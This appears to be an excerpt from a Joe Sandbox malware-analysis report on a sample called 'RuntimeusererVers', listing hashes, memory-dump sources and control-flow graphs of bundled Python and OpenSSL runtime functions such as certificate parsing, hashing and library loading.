                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d4b680c8fbf9edb19979a811f10c2301062f0395a2d2f5e894b0dd5952d67d99
                                                                                                                                                                                                                                          • Instruction ID: 1456e035284282d32c10e4ffb80c3e33d79a299c18320b18c1fa6e5d065487c4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4b680c8fbf9edb19979a811f10c2301062f0395a2d2f5e894b0dd5952d67d99
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACE14433618AA48BD710CF29E444A69BBA1F389794F155239EF9E83B54EB3DD905CF00
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1566630025.00007FF81DC81000.00000020.00000001.01000000.0000004C.sdmp, Offset: 00007FF81DC80000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566533062.00007FF81DC80000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566733514.00007FF81DCF0000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566834430.00007FF81DCFC000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566886856.00007FF81DCFD000.00000008.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566941654.00007FF81DCFE000.00000004.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1566971006.00007FF81DCFF000.00000002.00000001.01000000.0000004C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81dc80000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5dbf220896b3b4117e890ca3f7163f3f9e30713cbcf527afac9cea0a4bd4d305
                                                                                                                                                                                                                                          • Instruction ID: 1cdd87c28445d841d85fe19002ac1b571e95feeebb2357fb49c47ec7c64adbb8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dbf220896b3b4117e890ca3f7163f3f9e30713cbcf527afac9cea0a4bd4d305
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A610B23B1995146EB128E2CD404B6DAA52FB847B4F499731DE1E83BE1EB7DD887C300
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6c48ac75e1baa7433b9948ebc01d76e73772f8258ce357988e5072d9454c145e
                                                                                                                                                                                                                                          • Instruction ID: bae87fece81e006a0e566259507cd4b39abfed8ce1a90f60d0fd01c0f20beb6c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6c48ac75e1baa7433b9948ebc01d76e73772f8258ce357988e5072d9454c145e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E7115462F585A302F7F4DA7A7836F576581BBC5788F44A231AF4942D869F7C91000D04

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 38 7ff81e134f24-7ff81e134f5d PyDict_New 39 7ff81e1350fd 38->39 40 7ff81e134f63-7ff81e134f7d X509_get_subject_name call 7ff81e134c08 38->40 42 7ff81e1350ff-7ff81e135126 call 7ff81e132590 39->42 46 7ff81e1350ee-7ff81e1350f2 40->46 47 7ff81e134f83-7ff81e134fa1 PyDict_SetItemString 40->47 46->39 50 7ff81e1350f4-7ff81e1350f7 _Py_Dealloc 46->50 48 7ff81e134fba-7ff81e134fbd 47->48 49 7ff81e134fa3-7ff81e134fa6 47->49 52 7ff81e134fc8-7ff81e134fe2 X509_get_issuer_name call 7ff81e134c08 48->52 53 7ff81e134fbf-7ff81e134fc2 _Py_Dealloc 48->53 49->46 51 7ff81e134fac-7ff81e134fb5 _Py_Dealloc 49->51 50->39 51->46 52->46 56 7ff81e134fe8-7ff81e135006 PyDict_SetItemString 52->56 53->52 56->49 57 7ff81e135008-7ff81e13500b 56->57 58 7ff81e13500d-7ff81e135010 _Py_Dealloc 57->58 59 7ff81e135016-7ff81e13502e X509_get_version PyLong_FromLong 57->59 58->59 59->46 60 7ff81e135034-7ff81e135052 PyDict_SetItemString 59->60 60->49 61 7ff81e135058-7ff81e13505b 60->61 62 7ff81e13505d-7ff81e135060 _Py_Dealloc 61->62 63 7ff81e135066-7ff81e13507b BIO_s_mem BIO_new 61->63 62->63 64 7ff81e13507d-7ff81e13508e PyErr_SetString 63->64 65 7ff81e135090-7ff81e1350ce BIO_ctrl X509_get_serialNumber i2a_ASN1_INTEGER BIO_gets 63->65 64->46 66 7ff81e1350d0 65->66 67 7ff81e135127-7ff81e13513b PyUnicode_FromStringAndSize 65->67 70 7ff81e1350d8-7ff81e1350e0 call 7ff81e136120 66->70 68 7ff81e13513d-7ff81e13515b PyDict_SetItemString 67->68 69 7ff81e1350e5-7ff81e1350e8 BIO_free 67->69 71 7ff81e13515d-7ff81e135160 68->71 72 7ff81e135170-7ff81e135173 68->72 69->46 70->69 71->69 74 7ff81e135162-7ff81e13516b _Py_Dealloc 71->74 75 7ff81e13517e-7ff81e1351bc BIO_ctrl X509_get0_notBefore ASN1_TIME_print BIO_gets 72->75 76 7ff81e135175-7ff81e135178 _Py_Dealloc 72->76 74->69 77 7ff81e1351cb-7ff81e1351df PyUnicode_FromStringAndSize 75->77 78 7ff81e1351be-7ff81e1351c6 75->78 76->75 77->69 79 7ff81e1351e5-7ff81e135203 PyDict_SetItemString 77->79 78->70 79->71 80 7ff81e135209-7ff81e13520c 79->80 81 7ff81e13520e-7ff81e135211 _Py_Dealloc 80->81 82 7ff81e135217-7ff81e135255 BIO_ctrl X509_get0_notAfter ASN1_TIME_print BIO_gets 80->82 81->82 83 7ff81e135257 82->83 84 7ff81e135264-7ff81e135278 PyUnicode_FromStringAndSize 82->84 83->84 84->69 85 7ff81e13527e-7ff81e13529c PyDict_SetItemString 84->85 85->71 86 7ff81e1352a2-7ff81e1352a5 85->86 87 7ff81e1352b0-7ff81e1352c1 call 7ff81e1356c4 86->87 88 7ff81e1352a7-7ff81e1352aa _Py_Dealloc 86->88 87->69 91 7ff81e1352c7-7ff81e1352ce 87->91 88->87 92 7ff81e135302-7ff81e135315 call 7ff81e1353f8 91->92 93 7ff81e1352d0-7ff81e1352ee PyDict_SetItemString 91->93 92->69 98 7ff81e13531b-7ff81e135322 92->98 93->71 94 7ff81e1352f4-7ff81e1352f7 93->94 94->92 96 7ff81e1352f9-7ff81e1352fc _Py_Dealloc 94->96 96->92 99 7ff81e135350-7ff81e135363 call 7ff81e1353f8 98->99 100 7ff81e135324-7ff81e13533d PyDict_SetItemString 98->100 99->69 105 7ff81e135369-7ff81e135370 99->105 101 7ff81e135348-7ff81e13534a 100->101 102 7ff81e13533f-7ff81e135342 _Py_Dealloc 100->102 101->69 101->99 102->101 106 7ff81e13539e-7ff81e1353ac call 7ff81e135570 105->106 107 7ff81e135372-7ff81e13538b PyDict_SetItemString 105->107 106->69 112 7ff81e1353b2-7ff81e1353b9 106->112 108 7ff81e13538d-7ff81e135390 _Py_Dealloc 107->108 109 7ff81e135396-7ff81e135398 107->109 108->109 109->69 109->106 113 7ff81e1353bb-7ff81e1353d4 PyDict_SetItemString 112->113 114 7ff81e1353e7-7ff81e1353f3 BIO_free 112->114 115 7ff81e1353df-7ff81e1353e1 113->115 116 7ff81e1353d6-7ff81e1353d9 _Py_Dealloc 113->116 114->42 115->69 115->114 116->115
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$String$Dict_$Item$List_$X509_$From$SizeUnicode_$AppendE_printO_ctrlO_freeO_getsTupleX509_get0_notY_set$AfterBeforeE_entry_countE_get_entryErr_LongLong_O_newO_s_memX509_get_issuer_nameX509_get_subject_nameX509_get_versionY_get_dataY_get_object
                                                                                                                                                                                                                                          • String ID: OCSP$caIssuers$crlDistributionPoints$failed to allocate BIO$issuer$notAfter$notBefore$serialNumber$subject$subjectAltName$version
                                                                                                                                                                                                                                          • API String ID: 558561668-857226466
                                                                                                                                                                                                                                          • Opcode ID: 5cdc1d4fa55c418fd77a41406b52edc68a5df86abf3f78be9c08855c21ee90f8
                                                                                                                                                                                                                                          • Instruction ID: 4b7a613aa92777a4848d9389e0c5c7a0b622e1eba54912592cb61c77a5ab30f1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cdc1d4fa55c418fd77a41406b52edc68a5df86abf3f78be9c08855c21ee90f8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8D12425A0AF4382FE559B22E96427967A1BF86FF2F844630DD0E46B54EF3DF4948340

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 332 7ff81e4e1290-7ff81e4e12ca 333 7ff81e4e1551-7ff81e4e155c 332->333 334 7ff81e4e12d0-7ff81e4e12d7 332->334 335 7ff81e4e12da-7ff81e4e131c _PyArg_UnpackKeywords 333->335 336 7ff81e4e1562-7ff81e4e1565 333->336 334->335 337 7ff81e4e4c52 335->337 338 7ff81e4e1322-7ff81e4e1330 335->338 336->338 339 7ff81e4e156b 336->339 340 7ff81e4e1360-7ff81e4e1377 _PyArg_Parse_SizeT 338->340 341 7ff81e4e1332-7ff81e4e1339 338->341 339->335 344 7ff81e4e15f4-7ff81e4e1605 PyErr_SetString 340->344 345 7ff81e4e137d-7ff81e4e13bd 340->345 342 7ff81e4e134b-7ff81e4e135a PyObject_IsTrue 341->342 343 7ff81e4e133b-7ff81e4e1349 341->343 342->340 346 7ff81e4e160b 342->346 343->340 343->342 344->346 347 7ff81e4e140c-7ff81e4e1433 PyModule_GetState _Py_hashtable_get 345->347 348 7ff81e4e13bf-7ff81e4e13cd 345->348 349 7ff81e4e1613 346->349 351 7ff81e4e1439-7ff81e4e143c 347->351 352 7ff81e4e15cb-7ff81e4e15ce 347->352 348->349 350 7ff81e4e13d3-7ff81e4e13de PyObject_CheckBuffer 348->350 355 7ff81e4e161a-7ff81e4e162a PyErr_SetString 349->355 356 7ff81e4e13e4-7ff81e4e13f8 PyObject_GetBuffer 350->356 357 7ff81e4e4b86-7ff81e4e4b8d 350->357 358 7ff81e4e1535-7ff81e4e1538 351->358 359 7ff81e4e1442-7ff81e4e1446 351->359 353 7ff81e4e15d0-7ff81e4e15d9 EVP_get_digestbyname 352->353 354 7ff81e4e162f-7ff81e4e1631 352->354 368 7ff81e4e15e1-7ff81e4e15ef EVP_get_digestbyname 353->368 354->353 363 7ff81e4e1633 354->363 362 7ff81e4e14e8-7ff81e4e1521 call 7ff81e4e3c20 355->362 356->362 364 7ff81e4e13fe-7ff81e4e1406 356->364 357->355 360 7ff81e4e153e-7ff81e4e1542 358->360 361 7ff81e4e4bba-7ff81e4e4bbd 358->361 365 7ff81e4e4bd1-7ff81e4e4bdb EVP_get_digestbyname 359->365 366 7ff81e4e144c 359->366 360->368 369 7ff81e4e1548-7ff81e4e154c 360->369 361->359 370 7ff81e4e4bc3-7ff81e4e4bc6 361->370 371 7ff81e4e4be4-7ff81e4e4be7 363->371 364->347 373 7ff81e4e4b92-7ff81e4e4bb5 PyErr_SetString PyBuffer_Release 364->373 365->371 367 7ff81e4e1450-7ff81e4e1453 366->367 374 7ff81e4e1459-7ff81e4e1469 EVP_MD_flags 367->374 375 7ff81e4e1638-7ff81e4e164b call 7ff81e4e2300 367->375 368->369 369->367 370->359 376 7ff81e4e4bcc 370->376 371->353 377 7ff81e4e4bed-7ff81e4e4bf0 371->377 373->362 379 7ff81e4e1593-7ff81e4e1599 PyModule_GetState 374->379 380 7ff81e4e146f-7ff81e4e1484 PyModule_GetState _PyObject_New 374->380 376->375 377->375 381 7ff81e4e4bf6 377->381 390 7ff81e4e15a2-7ff81e4e15c9 PyEval_SaveThread call 7ff81e4e1820 PyEval_RestoreThread 379->390 383 7ff81e4e14d5-7ff81e4e14d8 380->383 384 7ff81e4e1486-7ff81e4e1497 EVP_MD_CTX_new 380->384 381->353 388 7ff81e4e14e5 383->388 389 7ff81e4e14da-7ff81e4e14df PyBuffer_Release 383->389 386 7ff81e4e149d-7ff81e4e14a3 384->386 387 7ff81e4e4bfb-7ff81e4e4bff 384->387 391 7ff81e4e14a5-7ff81e4e14b7 EVP_DigestInit_ex 386->391 392 7ff81e4e1522-7ff81e4e1530 EVP_MD_CTX_set_flags 386->392 393 7ff81e4e4c01-7ff81e4e4c04 _Py_Dealloc 387->393 394 7ff81e4e4c0a-7ff81e4e4c11 PyErr_NoMemory 387->394 388->362 389->388 399 7ff81e4e1584-7ff81e4e1588 390->399 396 7ff81e4e4c16-7ff81e4e4c2e call 7ff81e4e2300 391->396 397 7ff81e4e14bd-7ff81e4e14c5 391->397 392->391 393->394 394->383 396->383 407 7ff81e4e4c34 396->407 397->383 400 7ff81e4e14c7-7ff81e4e14cf 397->400 399->383 403 7ff81e4e158e-7ff81e4e4c3d 399->403 400->383 402 7ff81e4e1570-7ff81e4e1577 400->402 402->390 405 7ff81e4e1579-7ff81e4e1581 call 7ff81e4e1820 402->405 403->383 408 7ff81e4e4c43-7ff81e4e4c4d _Py_Dealloc 403->408 405->399 407->408 408->383
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Object_$Module_State$Arg_BufferDeallocDigestErr_Eval_P_get_digestbynameThread$Buffer_CheckD_flagsInit_exKeywordsMemoryParse_Py_hashtable_getReleaseRestoreSaveSizeStringTrueUnpackUpdateX_newX_set_flags
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$Strings must be encoded before hashing$name must be a string$object supporting the buffer API required$unsupported hash type %s
                                                                                                                                                                                                                                          • API String ID: 3145466953-2464896590
                                                                                                                                                                                                                                          • Opcode ID: 830aff63cd84496b6819a5005a6a5239bfdf339bdfc9b909ef5e8fed9a1a609f
                                                                                                                                                                                                                                          • Instruction ID: 48887fda49adde7be7f867f31cc4fdba85cd8e4d992faffcecc8f1958a3857bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 830aff63cd84496b6819a5005a6a5239bfdf339bdfc9b909ef5e8fed9a1a609f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCC11961A49F4382EA64CB22A858AB963A0BF85BF4F444735DD4E477A4DF7CF4E48300

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 411 7ff81e09a470-7ff81e09a4d7 call 7ff81e0812ee call 7ff81e0ee2c5 416 7ff81e09a656-7ff81e09a65f _errno 411->416 417 7ff81e09a4dd 411->417 419 7ff81e09a665-7ff81e09a6c7 GetLastError ERR_put_error ERR_add_error_data ERR_put_error 416->419 420 7ff81e09a738 416->420 418 7ff81e09a4e0-7ff81e09a4e9 417->418 421 7ff81e09a502-7ff81e09a518 call 7ff81e09af00 418->421 422 7ff81e09a4eb 418->422 423 7ff81e09a73e-7ff81e09a76c 419->423 420->423 431 7ff81e09a714-7ff81e09a736 ERR_put_error 421->431 432 7ff81e09a51e-7ff81e09a543 BIO_snprintf 421->432 424 7ff81e09a4f0-7ff81e09a4f6 422->424 426 7ff81e09a778-7ff81e09a794 call 7ff81e08191f 423->426 427 7ff81e09a76e-7ff81e09a773 OPENSSL_DIR_end 423->427 424->421 428 7ff81e09a4f8-7ff81e09a500 424->428 427->426 428->421 428->424 431->423 432->423 434 7ff81e09a549-7ff81e09a573 OPENSSL_sk_set_cmp_func BIO_s_file BIO_new 432->434 435 7ff81e09a6d3-7ff81e09a6f0 ERR_put_error 434->435 436 7ff81e09a579-7ff81e09a591 BIO_ctrl 434->436 437 7ff81e09a6f5-7ff81e09a712 BIO_free X509_free OPENSSL_sk_set_cmp_func 435->437 436->437 438 7ff81e09a597-7ff81e09a5ad PEM_read_bio_X509 436->438 437->423 439 7ff81e09a61b-7ff81e09a650 ERR_clear_error BIO_free X509_free OPENSSL_sk_set_cmp_func OPENSSL_DIR_read 438->439 440 7ff81e09a5af 438->440 439->416 439->418 441 7ff81e09a5b0-7ff81e09a5bd X509_get_subject_name 440->441 441->437 442 7ff81e09a5c3-7ff81e09a5d1 X509_NAME_dup 441->442 442->437 443 7ff81e09a5d7-7ff81e09a5e4 OPENSSL_sk_find 442->443 444 7ff81e09a5f0-7ff81e09a5fd OPENSSL_sk_push 443->444 445 7ff81e09a5e6-7ff81e09a5ee X509_NAME_free 443->445 446 7ff81e09a603-7ff81e09a619 PEM_read_bio_X509 444->446 447 7ff81e09a6c9-7ff81e09a6d1 X509_NAME_free 444->447 445->446 446->439 446->441 447->437
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$L_sk_set_cmp_funcX509_$E_freeM_read_bio_O_freeX509X509_free$E_dupErrorL_sk_findL_sk_pushLastO_ctrlO_newO_s_fileO_snprintfR_add_error_dataR_clear_errorR_endR_readX509_get_subject_name_errno
                                                                                                                                                                                                                                          • String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
                                                                                                                                                                                                                                          • API String ID: 1034648778-4291904164
                                                                                                                                                                                                                                          • Opcode ID: 627fe3b24fabd2d2a33f12e6dd11bf5debad2629e1e43702dac1066637e908aa
                                                                                                                                                                                                                                          • Instruction ID: e1d35768ab0a8966b5c4ca2357042ccaee1fe53fb7d095f5381339aa8ed8bb55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 627fe3b24fabd2d2a33f12e6dd11bf5debad2629e1e43702dac1066637e908aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65717561A1CE8686FE609F61E4117B96360FF857E4F440235EA4E17B96DF3CF8868B04

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 448 7ff81e508c60-7ff81e508cac 449 7ff81e508f0b-7ff81e508f22 _PyArg_ParseTuple_SizeT 448->449 450 7ff81e508cb2-7ff81e508cbd 448->450 451 7ff81e508f49 449->451 452 7ff81e508f24-7ff81e508f2f 449->452 450->449 453 7ff81e508cc3-7ff81e508cd1 450->453 454 7ff81e508f4b-7ff81e508f70 call 7ff81e51adb0 451->454 455 7ff81e508f32-7ff81e508f43 PyErr_SetString 452->455 456 7ff81e508e6f-7ff81e508e89 _PyArg_ParseTuple_SizeT 453->456 457 7ff81e508cd7-7ff81e508ce1 453->457 455->451 456->451 460 7ff81e508e8f-7ff81e508e9f 456->460 457->456 458 7ff81e508ce7-7ff81e508cf1 457->458 458->456 461 7ff81e508cf7-7ff81e508d01 458->461 463 7ff81e508ec1-7ff81e508ec8 460->463 464 7ff81e508ea1-7ff81e508ebc PyErr_Format 460->464 461->456 465 7ff81e508d07-7ff81e508d11 461->465 466 7ff81e508eca-7ff81e508ee1 PyErr_Format 463->466 467 7ff81e508ee3-7ff81e508f03 PyUnicode_FromFormat PyUnicode_AsUTF8 463->467 464->451 465->456 468 7ff81e508d17-7ff81e508d31 _PyArg_ParseTuple_SizeT 465->468 466->451 469 7ff81e508f06-7ff81e508f09 467->469 470 7ff81e508db0-7ff81e508ddf PyErr_Clear _PyArg_ParseTuple_SizeT 468->470 471 7ff81e508d33-7ff81e508d42 PyUnicode_AsUTF8 468->471 469->454 470->451 473 7ff81e508de5-7ff81e508df8 PyUnicode_AsUTF8 470->473 471->451 472 7ff81e508d48-7ff81e508d65 PyUnicode_GetSize 471->472 474 7ff81e508d71-7ff81e508d98 call 7ff81e51af60 PyUnicode_AsWideChar 472->474 475 7ff81e508d67 472->475 476 7ff81e508dfa-7ff81e508e00 PyMem_Free 473->476 477 7ff81e508e05-7ff81e508e08 473->477 474->451 483 7ff81e508d9e-7ff81e508dae LoadLibraryW 474->483 475->474 476->451 477->455 479 7ff81e508e0e-7ff81e508e1b LoadLibraryA PyMem_Free 477->479 480 7ff81e508e21-7ff81e508e24 479->480 480->469 482 7ff81e508e2a-7ff81e508e32 GetLastError 480->482 484 7ff81e508e4d-7ff81e508e6a PyErr_Format 482->484 485 7ff81e508e34-7ff81e508e48 call 7ff81e5011a0 482->485 483->480 484->451 485->484
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Unicode_$Err_Size$Arg_FormatParseTuple_$FreeLibraryLoadMem_$CharClearErrorFromLastStringWide
                                                                                                                                                                                                                                          • String ID: <None>$O|i:load_library$U|i:load_library$cannot call dlopen(NULL)$cannot load library '%s': %s$dlopen() takes a file name or 'void *' handle, not '%s'$dlopen(None) not supported on Windows$error 0x%x$et|i:load_library$|Oi:load_library
                                                                                                                                                                                                                                          • API String ID: 2215032769-880521189
                                                                                                                                                                                                                                          • Opcode ID: d33b9080e6081043660d333d8efc643bee4a4a70433360aad55e39fa3bf20ac8
                                                                                                                                                                                                                                          • Instruction ID: 76e6c8f9945fda89e7f392ca7a4de3ec130097bdc143c2455bf189866b78f1bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d33b9080e6081043660d333d8efc643bee4a4a70433360aad55e39fa3bf20ac8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4191EF21A09F42D6EA08CF66EC605E863A1FB84BE4B844632E91E477A4DF7DF509C340

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
